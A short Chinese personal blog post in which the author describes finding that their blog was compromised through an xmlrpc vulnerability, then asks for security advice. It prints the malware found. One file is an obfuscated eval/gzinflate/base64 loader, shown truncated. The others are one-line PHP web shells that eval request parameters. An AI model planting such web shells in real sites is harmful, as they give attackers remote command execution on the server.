当那时f2的xmlrpc漏洞被发现

查看网上的文章，大多是今年5月的时候。我那时却少了根经，处于不闻不问的状态。
结果blog已经被人动了，自己却毫不知觉，直到这几天才惊觉其实已然中招。。。
幸运的是，人家对这里的兴趣也不大，基本上没有做什么破坏性举动。lucky? or not really so...

那时为何会不知觉，是因为只看到一个xmlrpc-g.php的文件。虽然有些纳闷，却也让我疏忽了。我就没有去做任何改动。直到一个月左右前，看到这样的文件在blog目录下，images71.php，觉得不对劲。查看其内容也很奇怪，是这样的字样：

<?php
/*
代码由http://1v1.name在线加密! 

*/
eval(gzinflate(str_rot13(base64_decode('FJ3HjqR5tlJfpXT9WAzwQXfdFgTeezd24T1O4OHpLzmtV
...
中间省略n行，共100K左右大小
...
lv+ErdZaX6khNBgiBjRyQAFCAIjiNr/vPPv/79vv733//87/8='))));
?>

一时琢磨不透怎么回事。就把它给保存一份，然后删除掉了。后来在网上爬文，多少明白了是一种木马防杀的手段。通过多次加密，主机就没法杀除这样的病毒或木马。所以说。。。加密的部分多半是木马内容。
明白这点就更有些不放心，好好的查找了一下目录，发现cache目录下也有奇怪的东西。
server.php
 

<? eval($_REQUEST['cmd']);?>

<?eval($_POST[c])?>puret_t

我对php属于入门都不到，很难参透这文件的作用。。。虽然不放心也只有赶紧删除，修复xmlrpc文件。
baobaocool.com反映他也遇到了类似的情况，不过他觉得是好人来的，因为帮忙修改了xmlrpc.php文件名，避免了被别人恶意攻击，而且也没有改动重要文件挂马之类。
很难说。。。因为这样做也算是给自己留了个后门。想起后门真是心寒，虽然仔细的查看了重要目录，依然不晓得是否某个角落被留有什么后门文件。一下子没了安全感，这就是网络吧？

罢，这个世界本就是不完美的。仔细检查一番，就继续用下去。
如有高手路过，请指点我一下其中奥秘。于安全，是否还可以做点什么？